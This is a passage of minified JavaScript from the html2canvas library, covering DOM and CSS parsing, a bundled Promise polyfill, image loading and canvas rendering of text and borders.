E(){t.html2canvas.logging&&t.console&&t.console.log&&Function.prototype.bind.call(t.console.log,t.console).apply(t.console,[Date.now()-t.html2canvas.start+"ms","html2canvas:"].concat([].slice.call(arguments,0)))}function T(t,e){this.node=t,this.parent=e,this.stack=null,this.bounds=null,this.offsetBounds=null,this.visible=null,this.computedStyles=null,this.styles={},this.backgroundImages=null,this.transformData=null,this.transformMatrix=null}function C(t){var e=t.options[t.selectedIndex||0];return e?e.text||"":""}function k(t){return t&&"matrix"===t[1]?t[2].split(",").map(function(t){return parseFloat(t.trim())}):void 0}function I(t){return-1!==t.toString().indexOf("%")}function S(t){var e,n,r,i,o,s,a,c=" \r\n ",h=[],u=0,p=0,l=function(){e&&('"'===n.substr(0,1)&&(n=n.substr(1,n.length-2)),n&&a.push(n),"-"===e.substr(0,1)&&(i=e.indexOf("-",1)+1)>0&&(r=e.substr(0,i),e=e.substr(i)),h.push({prefix:r,method:e.toLowerCase(),value:o,args:a,image:null})),a=[],e=r=n=o=""};return a=[],e=r=n=o="",t.split("").forEach(function(t){if(!(0===u&&c.indexOf(t)>-1)){switch(t){case'"':s?s===t&&(s=null):s=t;break;case"(":if(s)break;if(0===u)return u=1,void(o+=t);p++;break;case")":if(s)break;if(1===u){if(0===p)return u=0,o+=t,void l();p--}break;case",":if(s)break;if(0===u)return void l();if(1===u&&0===p&&!e.match(/^url$/i))return a.push(n),n="",void(o+=t)}o+=t,0===u?e+=t:n+=t}}),l(),h}function R(t){return t.replace("px","")}function O(t){return parseFloat(t)}function B(t){if(t.getBoundingClientRect){var e=t.getBoundingClientRect(),n="BODY"===t.nodeName,r=n?t.scrollWidth:null==t.offsetWidth?e.width:t.offsetWidth;return{top:e.top,bottom:e.bottom||e.top+e.height,right:e.left+r,left:e.left,width:r,height:n?t.scrollHeight:null==t.offsetHeight?e.height:t.offsetHeight}}return{}}function M(t){var e=t.offsetParent?M(t.offsetParent):{top:0,left:0};return{top:t.offsetTop+e.top,bottom:t.offsetTop+t.offsetHeight+e.top,right:t.offsetLeft+e.left+t.offsetWidth,left:t.offsetLeft+e.left,width:t.offsetWidth,height:t.offsetHeight}}function P(t,e,n,r,i){E("Starting NodeParser"),this.renderer=e,this.options=i,this.range=null,this.support=n,this.renderQueue=[],this.stack=new le(!0,1,t.ownerDocument,null);var o=new T(t,null);t!==t.ownerDocument.documentElement&&this.renderer.isTransparent(o.css("backgroundColor"))&&e.rectangle(0,0,e.width,e.height,new T(t.ownerDocument.documentElement,null).css("backgroundColor")),o.visibile=o.isElementVisible(),this.createPseudoHideStyles(t.ownerDocument),this.nodes=ce([o].concat(this.getChildren(o)).filter(function(t){return t.visible=t.isElementVisible()}).map(this.getPseudoElements,this)),this.fontMetrics=new d,E("Fetched nodes"),this.images=r.fetch(this.nodes.filter(te)),E("Creating stacking contexts"),this.createStackingContexts(),E("Sorting stacking contexts"),this.sortStackingContexts(this.stack),this.ready=this.images.ready.then(ie(function(){return E("Images loaded, starting parsing"),this.parse(this.stack),E("Render queue created with "+this.renderQueue.length+" items"),new Promise(ie(function(t){i.async?"function"==typeof i.async?i.async.call(this,this.renderQueue,t):(this.renderIndex=0,this.asyncRenderer(this.renderQueue,t)):(this.renderQueue.forEach(this.paint,this),t())},this))},this))}function A(t){return t.replace(/(\-[a-z])/g,function(t){return t.toUpperCase().replace("-","")})}function N(){}function L(t,e,n,r){var i=4*((Math.sqrt(2)-1)/3),o=n*i,s=r*i,a=t+n,c=e+r;return{topLeft:_({x:t,y:c},{x:t,y:c-s},{x:a-o,y:e},{x:a,y:e}),topRight:_({x:t,y:e},{x:t+o,y:e},{x:a,y:c-s},{x:a,y:c}),bottomRight:_({x:a,y:e},{x:a,y:e+s},{x:t+o,y:c},{x:t,y:c}),bottomLeft:_({x:a,y:c},{x:a-o,y:c},{x:t,y:e+s},{x:t,y:e})}}function D(t,e,n){var r=t.left,i=t.top,o=t.width,s=t.height,a=e[0][0],c=e[0][1],h=e[1][0],u=e[1][1],p=e[2][0],l=e[2][1],d=e[3][0],f=e[3][1],g=o-h,m=s-l,y=o-p,v=s-f;return{topLeftOuter:L(r,i,a,c).topLeft.subdivide(.5),topLeftInner:L(r+n[3].width,i+n[0].width,Math.max(0,a-n[3].width),Math.max(0,c-n[0].width)).topLeft.subdivide(.5),topRightOuter:L(r+g,i,h,u).topRight.subdivide(.5),topRightInner:L(r+Math.min(g,o+n[3].width),i+n[0].width,g>o+n[3].width?0:h-n[3].width,u-n[0].width).topRight.subdivide(.5),bottomRightOuter:L(r+y,i+m,p,l).bottomRight.subdivide(.5),bottomRightInner:L(r+Math.min(y,o+n[3].width),i+Math.min(m,s+n[0].width),Math.max(0,p-n[1].width),Math.max(0,l-n[2].width)).bottomRight.subdivide(.5),bottomLeftOuter:L(r,i+v,d,f).bottomLeft.subdivide(.5),bottomLeftInner:L(r+n[3].width,i+v,Math.max(0,d-n[3].width),Math.max(0,f-n[2].width)).bottomLeft.subdivide(.5)}}function _(t,e,n,r){var i=function(t,e,n){return{x:t.x+(e.x-t.x)*n,y:t.y+(e.y-t.y)*n}};return{start:t,startControl:e,endControl:n,end:r,subdivide:function(o){var s=i(t,e,o),a=i(e,n,o),c=i(n,r,o),h=i(s,a,o),u=i(a,c,o),p=i(h,u,o);return[_(t,s,h,p),_(p,u,c,r)]},curveTo:function(t){t.push(["bezierCurve",e.x,e.y,n.x,n.y,r.x,r.y])},curveToReversed:function(r){r.push(["bezierCurve",n.x,n.y,e.x,e.y,t.x,t.y])}}}function F(t,e,n,r,i,o,s){var a=[];return e[0]>0||e[1]>0?(a.push(["line",r[1].start.x,r[1].start.y]),r[1].curveTo(a)):a.push(["line",t.c1[0],t.c1[1]]),n[0]>0||n[1]>0?(a.push(["line",o[0].start.x,o[0].start.y]),o[0].curveTo(a),a.push(["line",s[0].end.x,s[0].end.y]),s[0].curveToReversed(a)):(a.push(["line",t.c2[0],t.c2[1]]),a.push(["line",t.c3[0],t.c3[1]])),e[0]>0||e[1]>0?(a.push(["line",i[1].end.x,i[1].end.y]),i[1].curveToReversed(a)):a.push(["line",t.c4[0],t.c4[1]]),a}function W(t,e,n,r,i,o,s){e[0]>0||e[1]>0?(t.push(["line",r[0].start.x,r[0].start.y]),r[0].curveTo(t),r[1].curveTo(t)):t.push(["line",o,s]),(n[0]>0||n[1]>0)&&t.push(["line",i[0].start.x,i[0].start.y])}function H(t){return t.cssInt("zIndex")<0}function j(t){return t.cssInt("zIndex")>0}function V(t){return 0===t.cssInt("zIndex")}function z(t){return-1!==["inline","inline-block","inline-table"].indexOf(t.css("display"))}function Y(t){return t instanceof le}function X(t){return t.node.data.trim().length>0}function G(t){return/^(normal|none|0px)$/.test(t.parent.css("letterSpacing"))}function U(t){return["TopLeft","TopRight","BottomRight","BottomLeft"].map(function(e){var n=t.css("border"+e+"Radius"),r=n.split(" ");return r.length<=1&&(r[1]=r[0]),r.map(oe)})}function Q(t){return t.nodeType===Node.TEXT_NODE||t.nodeType===Node.ELEMENT_NODE}function q(t){var e=t.css("position"),n="absolute"===e||"relative"===e?t.css("zIndex"):"auto";return"auto"!==n}function $(t){return"static"!==t.css("position")}function J(t){return"none"!==t.css("float")}function K(t){return-1!==["inline-block","inline-table"].indexOf(t.css("display"))}function Z(t){var e=this;return function(){return!t.apply(e,arguments)}}function te(t){return t.node.nodeType===Node.ELEMENT_NODE}function ee(t){return t.node.nodeType===Node.TEXT_NODE}function ne(t,e){return t.cssInt("zIndex")-e.cssInt("zIndex")}function re(t){return t.css("opacity")<1}function ie(t,e){return function(){return t.apply(e,arguments)}}function oe(t){return parseInt(t,10)}function se(t){return t.width}function ae(t){return t.node.nodeType!==Node.ELEMENT_NODE||-1===["SCRIPT","HEAD","TITLE","OBJECT","BR","OPTION"].indexOf(t.node.nodeName)}function ce(t){return[].concat.apply([],t)}function he(t){var e=t.substr(0,1);return e===t.substr(t.length-1)&&e.match(/'|"/)?t.substr(1,t.length-2):t}function ue(r,i){var o="html2canvas_"+Te++,s=e.createElement("script"),a=e.createElement("a");a.href=r,r=a.href;var c=i+(i.indexOf("?")>-1?"&":"?")+"url="+encodeURIComponent(r)+"&callback="+o;this.src=r,this.image=new Image;var h=this;this.promise=new Promise(function(r,i){h.image.onload=r,h.image.onerror=i,t[o]=function(e){"error:"===e.substring(0,6)?i():h.image.src=e,t[o]=n;try{delete t[o]}catch(r){}s.parentNode.removeChild(s)},s.setAttribute("type","text/javascript"),s.setAttribute("src",c),e.body.appendChild(s)})["catch"](function(){var t=new p(r);return t.promise.then(function(t){h.image=t})})}function pe(t,e,n,r){this.width=t,this.height=e,this.images=n,this.options=r}function le(t,e,n,r){T.call(this,n,r),this.ownStacking=t,this.contexts=[],this.children=[],this.opacity=(this.parent?this.parent.stack.opacity:1)*e}function de(t){this.rangeBounds=this.testRangeBounds(t),this.cors=this.testCORS(),this.svg=this.testSVG()}function fe(t){this.src=t,this.image=null;var e=this;this.promise=this.hasFabric().then(function(){return e.isInline(t)?Promise.resolve(e.inlineFormatting(t)):be(t)}).then(function(t){return new Promise(function(n){html2canvas.fabric.loadSVGFromString(t,e.createCanvas.call(e,n))})})}function ge(t){var e,n,r,i,o,s,a,c,h="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/",u=t.length,p="";for(e=0;u>e;e+=4)n=h.indexOf(t[e]),r=h.indexOf(t[e+1]),i=h.indexOf(t[e+2]),o=h.indexOf(t[e+3]),s=n<<2|r>>4,a=(15&r)<<4|i>>2,c=(3&i)<<6|o,p+=64===i?String.fromCharCode(s):64===o||-1===o?String.fromCharCode(s,a):String.fromCharCode(s,a,c);return p}function me(t){this.src=t,this.image=null;var e=this;this.promise=this.hasFabric().then(function(){return new Promise(function(n){html2canvas.fabric.parseSVGDocument(t,e.createCanvas.call(e,n))})})}function ye(t,e){T.call(this,t,e)}function ve(t,e,n){return t.length>0?e+n.toUpperCase():void 0}function we(t){f.apply(this,arguments),this.type="linear"===t.args[0]?this.TYPES.LINEAR:this.TYPES.RADIAL}function be(t){return new Promise(function(e,n){var r=new XMLHttpRequest;r.open("GET",t),r.onload=function(){200===r.status?e(r.responseText):n(new Error(r.statusText))},r.onerror=function(){n(new Error("Network Error"))},r.send()})}function xe(t,n){pe.apply(this,arguments),this.canvas=e.createElement("canvas"),this.canvas.width=t,this.canvas.height=n,this.ctx=this.canvas.getContext("2d"),this.taintCtx=e.createElement("canvas").getContext("2d"),this.ctx.textBaseline="bottom",this.variables={},E("Initialized CanvasRenderer")}if(!function(){var n,r,i,o;!function(){var t={},e={};n=function(e,n,r){t[e]={deps:n,callback:r}},o=i=r=function(n){function i(t){if("."!==t.charAt(0))return t;for(var e=t.split("/"),r=n.split("/").slice(0,-1),i=0,o=e.length;o>i;i++){var s=e[i];if(".."===s)r.pop();else{if("."===s)continue;r.push(s)}}return r.join("/")}if(o._eak_seen=t,e[n])return e[n];if(e[n]={},!t[n])throw new Error("Could not find module "+n);for(var s,a=t[n],c=a.deps,h=a.callback,u=[],p=0,l=c.length;l>p;p++)u.push("exports"===c[p]?s={}:r(i(c[p])));var d=h.apply(this,u);return e[n]=s||d}}(),n("promise/all",["./utils","exports"],function(t,e){"use strict";function n(t){var e=this;if(!r(t))throw new TypeError("You must pass an array to all.");return new e(function(e,n){function r(t){return function(e){o(t,e)}}function o(t,n){a[t]=n,0===--c&&e(a)}var s,a=[],c=t.length;0===c&&e([]);for(var h=0;h<t.length;h++)s=t[h],s&&i(s.then)?s.then(r(h),n):o(h,s)})}var r=t.isArray,i=t.isFunction;e.all=n}),n("promise/asap",["exports"],function(n){"use strict";function r(){return function(){process.nextTick(s)}}function i(){var t=0,n=new u(s),r=e.createTextNode("");return n.observe(r,{characterData:!0}),function(){r.data=t=++t%2}}function o(){return function(){p.setTimeout(s,1)}}function s(){for(var t=0;t<l.length;t++){var e=l[t],n=e[0],r=e[1];n(r)}l=[]}function a(t,e){var n=l.push([t,e]);1===n&&c()}var c,h="undefined"!=typeof t?t:{},u=h.MutationObserver||h.WebKitMutationObserver,p="undefined"!=typeof global?global:this,l=[];c="undefined"!=typeof process&&"[object process]"==={}.toString.call(process)?r():u?i():o(),n.asap=a}),n("promise/cast",["exports"],function(t){"use strict";function e(t){if(t&&"object"==typeof t&&t.constructor===this)return t;var e=this;return new e(function(e){e(t)})}t.cast=e}),n("promise/config",["exports"],function(t){"use strict";function e(t,e){return 2!==arguments.length?n[t]:void(n[t]=e)}var n={instrument:!1};t.config=n,t.configure=e}),n("promise/polyfill",["./promise","./utils","exports"],function(e,n,r){"use strict";function i(){var e="Promise"in t&&"cast"in t.Promise&&"resolve"in t.Promise&&"reject"in t.Promise&&"all"in t.Promise&&"race"in t.Promise&&function(){var e;return new t.Promise(function(t){e=t}),s(e)}();e||(t.Promise=o)}var o=e.Promise,s=n.isFunction;r.polyfill=i}),n("promise/promise",["./config","./utils","./cast","./all","./race","./resolve","./reject","./asap","exports"],function(t,e,n,r,i,o,s,a,c){"use strict";function h(t){if(!E(t))throw new TypeError("You must pass a resolver function as the first argument to the promise constructor");if(!(this instanceof h))throw new TypeError("Failed to construct 'Promise': Please use the 'new' operator, this object constructor cannot be called as a function.");this._subscribers=[],u(t,this)}function u(t,e){function n(t){g(e,t)}function r(t){y(e,t)}try{t(n,r)}catch(i){r(i)}}function p(t,e,n,r){var i,o,s,a,c=E(n);if(c)try{i=n(r),s=!0}catch(h){a=!0,o=h}else i=r,s=!0;f(e,i)||(c&&s?g(e,i):a?y(e,o):t===M?g(e,i):t===P&&y(e,i))}function l(t,e,n,r){var i=t._subscribers,o=i.length;i[o]=e,i[o+M]=n,i[o+P]=r}function d(t,e){for(var n,r,i=t._subscribers,o=t._detail,s=0;s<i.length;s+=3)n=i[s],r=i[s+e],p(e,n,r,o);t._subscribers=null}function f(t,e){var n,r=null;try{if(t===e)throw new TypeError("A promises callback cannot return that same promise.");if(x(e)&&(r=e.then,E(r)))return r.call(e,function(r){return n?!0:(n=!0,void(e!==r?g(t,r):m(t,r)))},function(e){return n?!0:(n=!0,void y(t,e))}),!0}catch(i){return n?!0:(y(t,i),!0)}return!1}function g(t,e){t===e?m(t,e):f(t,e)||m(t,e)}function m(t,e){t._state===O&&(t._state=B,t._detail=e,b.async(v,t))}function y(t,e){t._state===O&&(t._state=B,t._detail=e,b.async(w,t))}function v(t){d(t,t._state=M)}function w(t){d(t,t._state=P)}var b=t.config,x=(t.configure,e.objectOrFunction),E=e.isFunction,T=(e.now,n.cast),C=r.all,k=i.race,I=o.resolve,S=s.reject,R=a.asap;b.async=R;var O=void 0,B=0,M=1,P=2;h.prototype={constructor:h,_state:void 0,_detail:void 0,_subscribers:void 0,then:function(t,e){var n=this,r=new this.constructor(function(){});if(this._state){var i=arguments;b.async(function(){p(n._state,r,i[n._state-1],n._detail)})}else l(this,r,t,e);return r},"catch":function(t){return this.then(null,t)}},h.all=C,h.cast=T,h.race=k,h.resolve=I,h.reject=S,c.Promise=h}),n("promise/race",["./utils","exports"],function(t,e){"use strict";function n(t){var e=this;if(!r(t))throw new TypeError("You must pass an array to race.");return new e(function(e,n){for(var r,i=0;i<t.length;i++)r=t[i],r&&"function"==typeof r.then?r.then(e,n):e(r)})}var r=t.isArray;e.race=n}),n("promise/reject",["exports"],function(t){"use strict";function e(t){var e=this;return new e(function(e,n){n(t)})}t.reject=e}),n("promise/resolve",["exports"],function(t){"use strict";function e(t){var e=this;return new e(function(e){e(t)})}t.resolve=e}),n("promise/utils",["exports"],function(t){"use strict";function e(t){return n(t)||"object"==typeof t&&null!==t}function n(t){return"function"==typeof t}function r(t){return"[object Array]"===Object.prototype.toString.call(t)}var i=Date.now||function(){return(new Date).getTime()};t.objectOrFunction=e,t.isFunction=n,t.isArray=r,t.now=i}),r("promise/polyfill").polyfill()}(),"function"!=typeof Object.create||"function"!=typeof e.createElement("canvas").getContext)return void(t.html2canvas=function(){return Promise.reject("No canvas support")});var Ee="data-html2canvas-node";t.html2canvas=function(i,o){o=o||{},o.logging&&(t.html2canvas.logging=!0,t.html2canvas.start=Date.now()),o.async="undefined"==typeof o.async?!0:o.async,o.allowTaint="undefined"==typeof o.allowTaint?!1:o.allowTaint,o.removeContainer="undefined"==typeof o.removeContainer?!0:o.removeContainer;var s=(i===n?[e.documentElement]:i.length?i:[i])[0];return s.setAttribute(Ee,"true"),r(s.ownerDocument,o,t.innerWidth,t.innerHeight).then(function(t){return"function"==typeof o.onrendered&&(E("options.onrendered is deprecated, html2canvas returns a Promise containing the canvas"),o.onrendered(t)),t})},d.prototype.getMetrics=function(t,e){return this.data[t+"-"+e]===n&&(this.data[t+"-"+e]=new l(t,e)),this.data[t+"-"+e]},f.prototype.TYPES={LINEAR:1,RADIAL:2},f.prototype.angleRegExp=/([+-]?\d*\.?\d+)(deg|grad|rad|turn)/,m.prototype.findImages=function(t){var e=[];return t.filter(y).map(w).forEach(this.addImage(e,this.loadImage),this),t.filter(v).map(b).forEach(this.addImage(e,this.loadImage),this),e},m.prototype.findBackgroundImage=function(t,e){return e.parseBackgroundImages().filter(this.hasImageBackground).forEach(this.addImage(t,this.loadImage),this),t},m.prototype.addImage=function(t,e){return function(n){n.args.forEach(function(r){this.imageExists(t,r)||(t.splice(0,0,e.call(this,n)),E("Added image #"+t.length,"string"==typeof r?r.substring(0,100):r))},this)}},m.prototype.hasImageBackground=function(t){return"none"!==t.method},m.prototype.loadImage=function(t){if("url"===t.method){var e=t.args[0];return!this.isSVG(e)||this.support.svg||this.options.allowTaint?e.match(/data:image\/.*;base64,/i)?new g(e.replace(/url\(['"]{0,}|['"]{0,}\)$/gi,""),!1):this.isSameOrigin(e)||this.options.allowTaint===!0||this.isSVG(e)?new g(e,!1):this.support.cors&&!this.options.allowTaint&&this.options.useCORS?new g(e,!0):this.options.proxy?new ue(e,this.options.proxy):new p(e):new fe(e)}return"linear-gradient"===t.method?new x(t):"gradient"===t.method?new we(t):"svg"===t.method?new me(t.args[0]):new p(t)},m.prototype.isSVG=function(t){return/(.+).svg$/i.test(t)||fe.prototype.isInline(t)},m.prototype.imageExists=function(t,e){return t.some(function(t){return t.src===e})},m.prototype.isSameOrigin=function(t){var n=this.link||(this.link=e.createElement("a"));n.href=t,n.href=n.href;var r=n.protocol+n.hostname+n.port;return r===this.origin},m.prototype.getPromise=function(t){return t.promise},m.prototype.get=function(t){var e=null;return this.images.some(function(n){return(e=n).src===t})?e:null},m.prototype.fetch=function(t){return this.images=t.reduce(ie(this.findBackgroundImage,this),this.findImages(t)),this.images.forEach(function(t,e){t.promise.then(function(){E("Succesfully loaded image #"+(e+1))},function(){E("Failed loading image #"+(e+1))})}),this.ready=Promise.all(this.images.map(this.getPromise)),E("Finished searching images"),this},x.prototype=Object.create(f.prototype),x.prototype.stepRegExp=/((?:rgb|rgba)\(\d{1,3},\s\d{1,3},\s\d{1,3}(?:,\s[0-9\.]+)?\))\s*(\d{1,3})?(%|px)?/,T.prototype.assignStack=function(t){this.stack=t,t.children.push(this)},T.prototype.isElementVisible=function(){return this.node.nodeType===Node.TEXT_NODE?this.parent.visible:"none"!==this.css("display")&&"hidden"!==this.css("visibility")&&!this.node.hasAttribute("data-html2canvas-ignore")},T.prototype.css=function(t){return this.computedStyles||(this.computedStyles=this.computedStyle(null)),this.styles[t]||(this.styles[t]=this.computedStyles[t])},T.prototype.prefixedCss=function(t){var e=["webkit","moz","ms","o"],r=this.css(t);return r===n&&e.some(function(e){return r=this.css(e+t.substr(0,1).toUpperCase()+t.substr(1)),r!==n},this),r===n?null:r},T.prototype.computedStyle=function(t){return this.node.ownerDocument.defaultView.getComputedStyle(this.node,t)},T.prototype.cssInt=function(t){var e=parseInt(this.css(t),10);return isNaN(e)?0:e},T.prototype.cssFloat=function(t){var e=parseFloat(this.css(t));return isNaN(e)?0:e},T.prototype.fontWeight=function(){var t=this.css("fontWeight");switch(parseInt(t,10)){case 401:t="bold";break;case 400:t="normal"}return t},T.prototype.parseBackgroundImages=function(){return this.backgroundImages||(this.backgroundImages=S(this.css("backgroundImage")))},T.prototype.cssList=function(t,e){var n=(this.css(t)||"").split(",");return n=n[e||0]||n[0]||"auto",n=n.trim().split(" "),1===n.length&&(n=[n[0],n[0]]),n},T.prototype.parseBackgroundSize=function(t,e,n){var r,i,o=this.cssList("backgroundSize",n);if(I(o[0]))r=t.width*parseFloat(o[0])/100;else{if(/contain|cover/.test(o[0])){var s=t.width/t.height,a=e.width/e.height;return a>s^"contain"===o[0]?{width:t.height*a,height:t.height}:{width:t.width,height:t.width/a}}r=parseInt(o[0],10)}return i="auto"===o[0]&&"auto"===o[1]?e.height:"auto"===o[1]?r/e.width*e.height:I(o[1])?t.height*parseFloat(o[1])/100:parseInt(o[1],10),"auto"===o[0]&&(r=i/e.height*e.width),{width:r,height:i}},T.prototype.parseBackgroundPosition=function(t,e,n,r){var i,o,s=this.cssList("backgroundPosition",n);return i=I(s[0])?(t.width-(r||e).width)*(parseFloat(s[0])/100):parseInt(s[0],10),o="auto"===s[1]?i/e.width*e.height:I(s[1])?(t.height-(r||e).height)*parseFloat(s[1])/100:parseInt(s[1],10),"auto"===s[0]&&(i=o/e.height*e.width),{left:i,top:o}},T.prototype.parseBackgroundRepeat=function(t){return this.cssList("backgroundRepeat",t)[0]},T.prototype.parseTextShadows=function(){var t=this.css("textShadow"),e=[];if(t&&"none"!==t)for(var n=t.match(this.TEXT_SHADOW_PROPERTY),r=0;n&&r<n.length;r++){var i=n[r].match(this.TEXT_SHADOW_VALUES);e.push({color:i[0],offsetX:i[1]?i[1].replace("px",""):0,offsetY:i[2]?i[2].replace("px",""):0,blur:i[3]?i[3].replace("px",""):0})}return e},T.prototype.parseTransform=function(){if(!this.transformData)if(this.hasTransform()){var t=this.parseBounds(),e=this.prefixedCss("transformOrigin").split(" ").map(R).map(O);e[0]+=t.left,e[1]+=t.top,this.transformData={origin:e,matrix:this.parseTransformMatrix()}}else this.transformData={origin:[0,0],matrix:[1,0,0,1,0,0]};return this.transformData},T.prototype.parseTransformMatrix=function(){if(!this.transformMatrix){var t=this.prefixedCss("transform"),e=t?k(t.match(this.MATRIX_PROPERTY)):null;this.transformMatrix=e?e:[1,0,0,1,0,0]}return this.transformMatrix},T.prototype.parseBounds=function(){return this.bounds||(this.bounds=this.hasTransform()?M(this.node):B(this.node))},T.prototype.hasTransform=function(){return"1,0,0,1,0,0"!==this.parseTransformMatrix().join(",")||this.parent&&this.parent.hasTransform()},T.prototype.getValue=function(){var t=this.node.value||"";return t="SELECT"===this.node.tagName?C(this.node):t,0===t.length?this.node.placeholder||"":t},T.prototype.MATRIX_PROPERTY=/(matrix)\((.+)\)/,T.prototype.TEXT_SHADOW_PROPERTY=/((rgba|rgb)\([^\)]+\)(\s-?\d+px){0,})/g,T.prototype.TEXT_SHADOW_VALUES=/(-?\d+px)|(#.+)|(rgb\(.+\))|(rgba\(.+\))/g,P.prototype.asyncRenderer=function(t,e,n){n=n||Date.now(),this.paint(t[this.renderIndex++]),t.length===this.renderIndex?e():n+20>Date.now()?this.asyncRenderer(t,e,n):setTimeout(ie(function(){this.asyncRenderer(t,e)},this),0)},P.prototype.createPseudoHideStyles=function(t){var e=t.createElement("style");e.innerHTML="."+this.pseudoHideClass+':before { content: "" !important; display: none !important; }.'+this.pseudoHideClass+':after { content: "" !important; display: none !important; }',t.body.appendChild(e)},P.prototype.getPseudoElements=function(t){var e=[[t]];if(t.node.nodeType===Node.ELEMENT_NODE){var n=this.getPseudoElement(t,":before"),r=this.getPseudoElement(t,":after");n&&(t.node.insertBefore(n[0].node,t.node.firstChild),e.push(n)),r&&(t.node.appendChild(r[0].node),e.push(r)),(n||r)&&(t.node.className+=" "+this.pseudoHideClass)}return ce(e)},P.prototype.getPseudoElement=function(t,n){var r=t.computedStyle(n);if(!r||!r.content||"none"===r.content||"-moz-alt-content"===r.content||"none"===r.display)return null;for(var i=he(r.content),o="url"===i.substr(0,3),s=e.createElement(o?"img":"html2canvaspseudoelement"),a=new T(s,t),c=r.length-1;c>=0;c--){var h=A(r.item(c));s.style[h]=r[h]}if(s.className=this.pseudoHideClass,o)return s.src=S(i)[0].args[0],[a];var u=e.createTextNode(i);return s.appendChild(u),[a,new ye(u,a)]},P.prototype.getChildren=function(t){return ce([].filter.call(t.node.childNodes,Q).map(function(e){var n=[e.nodeType===Node.TEXT_NODE?new ye(e,t):new T(e,t)].filter(ae);return e.nodeType===Node.ELEMENT_NODE&&n.length&&"TEXTAREA"!==e.tagName?n[0].isElementVisible()?n.concat(this.getChildren(n[0])):[]:n},this))},P.prototype.newStackingContext=function(t,e){var n=new le(e,t.cssFloat("opacity"),t.node,t.parent);n.visible=t.visible;var r=e?n.getParentStack(this):n.parent.stack;r.contexts.push(n),t.stack=n},P.prototype.createStackingContexts=function(){this.nodes.forEach(function(t){te(t)&&(this.isRootElement(t)||re(t)||q(t)||this.isBodyWithTransparentRoot(t)||t.hasTransform())?this.newStackingContext(t,!0):te(t)&&($(t)&&V(t)||K(t)||J(t))?this.newStackingContext(t,!1):t.assignStack(t.parent.stack)},this)},P.prototype.isBodyWithTransparentRoot=function(t){return"BODY"===t.node.nodeName&&this.renderer.isTransparent(t.parent.css("backgroundColor"))},P.prototype.isRootElement=function(t){return null===t.parent},P.prototype.sortStackingContexts=function(t){t.contexts.sort(ne),t.contexts.forEach(this.sortStackingContexts,this)},P.prototype.parseTextBounds=function(t){return function(e,n,r){if("none"!==t.parent.css("textDecoration").substr(0,4)||0!==e.trim().length){if(this.support.rangeBounds&&!t.parent.hasTransform()){var i=r.slice(0,n).join("").length;return this.getRangeBounds(t.node,i,e.length)}if(t.node&&"string"==typeof t.node.data){var o=t.node.splitText(e.length),s=this.getWrapperBounds(t.node,t.parent.hasTransform());return t.node=o,s}}else(!this.support.rangeBounds||t.parent.hasTransform())&&(t.node=t.node.splitText(e.length));return{}}},P.prototype.getWrapperBounds=function(t,e){var n=t.ownerDocument.createElement("html2canvaswrapper"),r=t.parentNode,i=t.cloneNode(!0);n.appendChild(t.cloneNode(!0)),r.replaceChild(n,t);var o=e?M(n):B(n);return r.replaceChild(i,n),o},P.prototype.getRangeBounds=function(t,e,n){var r=this.range||(this.range=t.ownerDocument.createRange());return r.setStart(t,e),r.setEnd(t,e+n),r.getBoundingClientRect()},P.prototype.parse=function(t){var e=t.contexts.filter(H),n=t.children.filter(te),r=n.filter(Z(J)),i=r.filter(Z($)).filter(Z(z)),o=n.filter(Z($)).filter(J),s=r.filter(Z($)).filter(z),a=t.contexts.concat(r.filter($)).filter(V),c=t.children.filter(ee).filter(X),h=t.contexts.filter(j);e.concat(i).concat(o).concat(s).concat(a).concat(c).concat(h).forEach(function(t){this.renderQueue.push(t),Y(t)&&(this.parse(t),this.renderQueue.push(new N))},this)},P.prototype.paint=function(t){try{t instanceof N?this.renderer.ctx.restore():ee(t)?this.paintText(t):this.paintNode(t)}catch(e){E(e)}},P.prototype.paintNode=function(t){Y(t)&&(this.renderer.setOpacity(t.opacity),this.renderer.ctx.save(),t.hasTransform()&&this.renderer.setTransform(t.parseTransform()));var e=t.parseBounds(),n=this.parseBorders(t);switch(this.renderer.clip(n.clip,function(){this.renderer.renderBackground(t,e,n.borders.map(se))},this),this.renderer.renderBorders(n.borders),t.node.nodeName){case"svg":var r=this.images.get(t.node);r?this.renderer.renderImage(t,e,n,r):E("Error loading <svg>",t.node);break;case"IMG":var i=this.images.get(t.node.src);i?this.renderer.renderImage(t,e,n,i):E("Error loading <img>",t.node.src);break;case"SELECT":case"INPUT":case"TEXTAREA":this.paintFormValue(t)}},P.prototype.paintFormValue=function(t){if(t.getValue().length>0){var e=t.node.ownerDocument,n=e.createElement("html2canvaswrapper"),r=["lineHeight","textAlign","fontFamily","fontWeight","fontSize","color","paddingLeft","paddingTop","paddingRight","paddingBottom","width","height","borderLeftStyle","borderTopStyle","borderLeftWidth","borderTopWidth","boxSizing","whiteSpace","wordWrap"];
    189  -r.forEach(function(e){try{n.style[e]=t.css(e)}catch(r){E("html2canvas: Parse: Exception caught in renderFormValue: "+r.message)}});var i=t.parseBounds();n.style.position="absolute",n.style.left=i.left+"px",n.style.top=i.top+"px",n.textContent=t.getValue(),e.body.appendChild(n),this.paintText(new ye(n.firstChild,t)),e.body.removeChild(n)}},P.prototype.paintText=function(t){t.applyTextTransform();var e=t.node.data.split(!this.options.letterRendering||G(t)?/(\b| )/:""),n=t.parent.fontWeight(),r=t.parent.css("fontSize"),i=t.parent.css("fontFamily"),o=t.parent.parseTextShadows();this.renderer.font(t.parent.css("color"),t.parent.css("fontStyle"),t.parent.css("fontVariant"),n,r,i),o.length?this.renderer.fontShadow(o[0].color,o[0].offsetX,o[0].offsetY,o[0].blur):this.renderer.clearShadow(),e.map(this.parseTextBounds(t),this).forEach(function(n,o){n&&(this.renderer.text(e[o],n.left,n.bottom),this.renderTextDecoration(t.parent,n,this.fontMetrics.getMetrics(i,r)))},this)},P.prototype.renderTextDecoration=function(t,e,n){switch(t.css("textDecoration").split(" ")[0]){case"underline":this.renderer.rectangle(e.left,Math.round(e.top+n.baseline+n.lineWidth),e.width,1,t.css("color"));break;case"overline":this.renderer.rectangle(e.left,Math.round(e.top),e.width,1,t.css("color"));break;case"line-through":this.renderer.rectangle(e.left,Math.ceil(e.top+n.middle+n.lineWidth),e.width,1,t.css("color"))}},P.prototype.parseBorders=function(t){var e=t.bounds,n=U(t),r=["Top","Right","Bottom","Left"].map(function(e){return{width:t.cssInt("border"+e+"Width"),color:t.css("border"+e+"Color"),args:null}}),i=D(e,n,r);return{clip:this.parseBackgroundClip(t,i,r,n,e),borders:r.map(function(t,o){if(t.width>0){var 